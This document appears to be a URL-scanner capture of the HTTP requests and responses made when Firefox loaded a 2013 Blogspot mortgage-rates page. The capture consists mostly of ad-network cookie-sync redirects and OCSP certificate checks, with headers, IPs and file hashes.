                                            GET /ServiceLogin?passive=true&continue=https://www.blogger.com/followers.g?blogID%3D5450608990018187715%26colors%3DCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByMzMzMzMzMiByM1NTg4YWEqByNmZmZmZmYyByNjYzAwMDA6ByMzMzMzMzNCByM1NTg4YWFKByNlZWVlZWVSByM1NTg4YWFaC3RyYW5zcGFyZW50%26pageSize%3D21%26origin%3Dhttp://edoses.blogspot.com/%26usegapi%3D1%26jsh%3Dm;/_/scs/abc-static/_/js/k%253Dgapi.lb.en.z9QjrzsHcOc.O/d%253D1/rs%253DAHpOoo8359JQqZQ0dzCVJ5Ui3CZcERHEWA/m%253D__features__%26bpli%3D1&followup=https://www.blogger.com/followers.g?blogID%3D5450608990018187715%26colors%3DCgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByMzMzMzMzMiByM1NTg4YWEqByNmZmZmZmYyByNjYzAwMDA6ByMzMzMzMzNCByM1NTg4YWFKByNlZWVlZWVSByM1NTg4YWFaC3RyYW5zcGFyZW50%26pageSize%3D21%26origin%3Dhttp://edoses.blogspot.com/%26usegapi%3D1%26jsh%3Dm;/_/scs/abc-static/_/js/k%253Dgapi.lb.en.z9QjrzsHcOc.O/d%253D1/rs%253DAHpOoo8359JQqZQ0dzCVJ5Ui3CZcERHEWA/m%253D__features__%26bpli%3D1&go=true HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://edoses.blogspot.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Thu, 29 Sep 2022 03:49:07 GMT
location: https://www.blogger.com/followers.g?blogID=5450608990018187715&colors=Cgt0cmFuc3BhcmVudBILdHJhbnNwYXJlbnQaByMzMzMzMzMiByM1NTg4YWEqByNmZmZmZmYyByNjYzAwMDA6ByMzMzMzMzNCByM1NTg4YWFKByNlZWVlZWVSByM1NTg4YWFaC3RyYW5zcGFyZW50&pageSize=21&origin=http%3A%2F%2Fedoses.blogspot.com%2F&usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.z9QjrzsHcOc.O%2Fd%3D1%2Frs%3DAHpOoo8359JQqZQ0dzCVJ5Ui3CZcERHEWA%2Fm%3D__features__&bpli=1
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-security-policy: require-trusted-types-for 'script';report-uri /cspreport, script-src 'nonce-VARi7OQzMbVKAA9vna-ayQ' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 465
server: GSE
set-cookie: __Host-GAPS=1:J46NwPCrcU8-kIwmGogpSTUH4woXQw:VfFHVUaW-QuUioss;Path=/;Expires=Sat, 28-Sep-2024 03:49:07 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (498)
Size:   465
Md5:    fba3e78d274c784786fced426c48a018
Sha1:   d8489364e69dbed30375a822220a20c16b3fa6ce
Sha256: c188237a536bde05c856eb76b41b1940793fc71e7488e907c9bf0925623fa760
                                        
                                            GET /cksync?cs=41&ovsid=setstatuscode&type=inf&redirect=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fmnet-usync%3Fuid%3D%3Cvsid%3E HTTP/1.1 
Host: cs.media.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         23.38.200.22
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
                                        
Server: Apache
Content-Length: 154
Location: https://router.infolinks.com/dyn/mnet-usync?uid=0000EEA
Set-Cookie: data-inf=setstatuscode~~41;Expires=Wed, 28 Dec 2022 03:49:08 GMT;path=/;domain=.media.net;
P3P: CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA", CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA
X-MNET-HL2: E
Expires: Thu, 29 Sep 2022 03:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 29 Sep 2022 03:49:08 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   154
Md5:    52558d05355ee6e9d14ff3cf8a5a3ef0
Sha1:   52cfd7dd3859dc0578849a7b1c91bb8f91ad84c2
Sha256: bac5546ea0f819f461c9023592ec2398a45a6c3aab78e55fed8b7c908dce6060
                                        
                                            GET /usermatch?s=191306&cb=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fix-usync%3Fuid%3D HTTP/1.1 
Host: ssum-sec.casalemedia.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         104.18.18.126
HTTP/2 302 Found
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 0
location: /usermatch?cb=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fix-usync%3Fuid%3D&s=191306&C=1
cf-ray: 7521bf45dadcb4ff-OSL
cache-control: no-cache
expires: 0
cf-cache-status: DYNAMIC
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
pragma: no-cache
set-cookie: CMID=YzUVtELJOckzXPvLtE7kyQAA; Path=/; Domain=casalemedia.com; Expires=Fri, 29 Sep 2023 03:49:08 GMT; Max-Age=31536000; Secure; SameSite=None CMPS=4536; Path=/; Domain=casalemedia.com; Expires=Wed, 28 Dec 2022 03:49:08 GMT; Max-Age=7776000; Secure; SameSite=None CMPRO=4536; Path=/; Domain=casalemedia.com; Expires=Wed, 28 Dec 2022 03:49:08 GMT; Max-Age=7776000; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=h9mEkSElFZsz2LBwLhnxEcm4nCI1gXjhsNUiFK2V6KRduxFie3wOkAk62zkZdhZYggShtRsPbVFgmCYOEsX1TOQyioS%2BuABOQLM0Ei2z5SRPRufKDSGSqSE78W7H8mLHfdtBOddWnx2KyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6575
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 01:59:33 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6575
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 01:59:33 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /dyn/iq-usync HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/usync/manage?pid=1875257&wsid=0&pdom=edoses.blogspot.com&purl=http%3A%2F%2Fedoses.blogspot.com%2F2013%2F01%2Ffree-mortgage-loan-rates.html
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 0
cache-control: no-store
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf45a950b4fd-OSL
X-Firefox-Spdy: h2

                                        
                                            GET /AdServer/ImgSync?p=60809&gdpr=&gdpr_consent=&pu=https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D60809%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Frouter.infolinks.com%252Fdyn%252Fusersync%253Fpmuservalue%253D%2523PMUID HTTP/1.1 
Host: image8.pubmatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         198.47.127.18
HTTP/2 200 OK
                                        
date: Thu, 29 Sep 2022 03:49:07 GMT
content-length: 0
X-Firefox-Spdy: h2

                                        
                                            GET /AdServer/ImgSync?p=156872&gdpr=&gdpr_consent=&pu=https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D156872%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Frouter.infolinks.com%252Fdyn%252Fpbm-usync%253Fuid%253D%2523PMUID HTTP/1.1 
Host: image8.pubmatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         198.47.127.18
HTTP/2 200 OK
                                        
date: Thu, 29 Sep 2022 03:49:06 GMT
content-length: 0
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: status.geotrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 2627
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 03:05:21 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1351
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 03:26:38 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 313

                                        
                                            GET /w/1.0/cm?id=9b5994f2-035d-46de-8c12-bc0e9a4e66c2&r=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fox-usync%3Fuid%3D HTTP/1.1 
Host: u.openx.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         35.244.159.8
HTTP/2 200 OK
content-type: text/html
                                        
vary: Accept, Accept-Encoding
server: OXGW/0.0.0
pragma: no-cache
p3p: CP="CUR ADM OUR NOR STA NID"
expires: Mon, 26 Jul 1997 05:00:00 GMT
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 56
content-encoding: gzip
cache-control: private, max-age=0, no-cache
via: 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   56
Md5:    15669dda86db3cbff7835fa202dc0b16
Sha1:   ce788cab9c1aa7e458a3971a59702c410b37e64d
Sha256: 5cc3f958039a8885c4e9526e22d454da47d579b9a02861e7a60b41fa0ba910df
                                        
                                            GET /usync/?pubId=598ce3ddaee8c90 HTTP/1.1 
Host: onetag-sys.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         51.89.9.253
HTTP/2 204 No Content
                                        
cache-control: no-store
strict-transport-security: max-age=15552000
X-Firefox-Spdy: h2

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3387
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 02:52:41 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /dyn/mnet-usync?uid=0000EEA HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store, no-cache, private
set-cookie: MNETUSERCOOKIE=0000EEA; Domain=infolinks.com; Expires=Wed, 28-Dec-2022 03:49:08 GMT; Path=/; SameSite=None; Secure
pragma: no-cache
expires: Wed, 29 Sep 2021 03:49:08 GMT
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf46198eb4fd-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 01:55:57 GMT
Expires: Wed, 05 Oct 2022 01:55:56 GMT
Etag: "91502e4eabf4935c7e4f1d0463e9396ff71284fa"
Cache-Control: max-age=511007,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf46af84b518-OSL

                                        
                                            GET /usync/manage?pid=1875257&wsid=0&pdom=edoses.blogspot.com&purl=http%3A%2F%2Fedoses.blogspot.com%2F2013%2F01%2Ffree-mortgage-loan-rates.html HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://edoses.blogspot.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: text/html;charset=UTF-8
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
cache-control: no-store
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf4488d3b4fd-OSL
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   2512
Md5:    40cb50cdfface19619992925d05fdfc2
Sha1:   7baff6dca783cac091a0dff0d70f1450529fafef
Sha256: fa1c707e81b02c6590ebd43520cceeaf0c3602163445b4fd5fc40b138f1103ee
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 02:36:02 GMT
Server: ECS (nyb/1D16)
X-Cache: Miss from cloudfront
Via: 1.1 dbfaae0db03f11cf713bbcbdb25be4a2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: hCOSBzO5JUqRDzKjG9XPRbxvdwXo4z3VZ3WPQGzgECIZa-DNJNTHXw==
Age: 4386

                                        
                                            GET /pixel/p-u1vdacBMXAcfT.gif?idmatch=0 HTTP/1.1 
Host: cms.quantserve.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         91.228.74.159
HTTP/2 302 Found
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 0
cache-control: private, no-cache, no-store, proxy-revalidate
expires: Fri, 04 Aug 1978 12:00:00 GMT
location: https://router.infolinks.com/dyn/qc-usync?&uid=Rt_eakHZj2td2I5qEd7Aa0SK3z5d2dk-RN5i_7Pn
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
pragma: no-cache
set-cookie: d=EEUBDQGbJ82aswA; expires=Wed, 28-Dec-2022 03:49:08 GMT; path=/; domain=.quantserve.com mc=633515b4-4c5a2-44f2a-54a42; expires=Mon, 30-Oct-2023 03:49:08 GMT; path=/; domain=.quantserve.com
X-Firefox-Spdy: h2

                                        
                                            GET /getuid?https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fapn-usync%3Fuser_id%3D%24UID HTTP/1.1 
Host: ib.adnxs.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         37.252.172.249
HTTP/1.1 307 Redirection
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.21.3
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
X-XSS-Protection: 0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Location: https://ib.adnxs.com/bounce?%2Fgetuid%3Fhttps%253A%252F%252Frouter.infolinks.com%252Fdyn%252Fapn-usync%253Fuser_id%253D%2524UID
AN-X-Request-Uuid: 143bfbb0-cc37-4d9b-9a7c-db78de395f8d
Set-Cookie: uuid2=8283819994076466655; SameSite=None; Path=/; Max-Age=7776000; Expires=Wed, 28-Dec-2022 03:49:08 GMT; Domain=.adnxs.com; Secure; HttpOnly
X-Proxy-Origin: 91.90.42.154; 91.90.42.154; 534.bm-nginx-loadbalancer.mgmt.fra1.adnexus.net; adnxs.com

                                        
                                            POST / HTTP/1.1 
Host: status.geotrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3527
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 02:50:22 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /getuid?https://s.cpx.to/ca.png?ref=http%253A%252F%252Fedoses.blogspot.com%252F2013%252F01%252Ffree-mortgage-loan-rates.html&pid=12306&adnxs_uid=$UID HTTP/1.1 
Host: ib.adnxs.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         37.252.172.249
HTTP/1.1 307 Redirection
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.21.3
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
X-XSS-Protection: 0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Location: https://ib.adnxs.com/bounce?%2Fgetuid%3Fhttps%3A%2F%2Fs.cpx.to%2Fca.png%3Fref%3Dhttp%25253A%25252F%25252Fedoses.blogspot.com%25252F2013%25252F01%25252Ffree-mortgage-loan-rates.html%26pid%3D12306%26adnxs_uid%3D%24UID
AN-X-Request-Uuid: ae9f3bbc-9933-4ee4-a244-4cc38c1acb6b
Set-Cookie: uuid2=4158955662997830432; SameSite=None; Path=/; Max-Age=7776000; Expires=Wed, 28-Dec-2022 03:49:08 GMT; Domain=.adnxs.com; Secure; HttpOnly
X-Proxy-Origin: 91.90.42.154; 91.90.42.154; 534.bm-nginx-loadbalancer.mgmt.fra1.adnexus.net; adnxs.com

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 02:36:55 GMT
Server: ECS (nyb/1D0B)
X-Cache: Miss from cloudfront
Via: 1.1 9ede9483eb891e14681c7c693b47c862.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 2-i2GbcDIQBq-wzEgMdJJMX1ae6ns_b6ZDFq0olOQ5K6SbTkCTXMaw==
Age: 4333

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4727
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 02:30:21 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /dyn/ix-usync?uid=0 HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://ssum-sec.casalemedia.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf4669adb4fd-OSL
X-Firefox-Spdy: h2


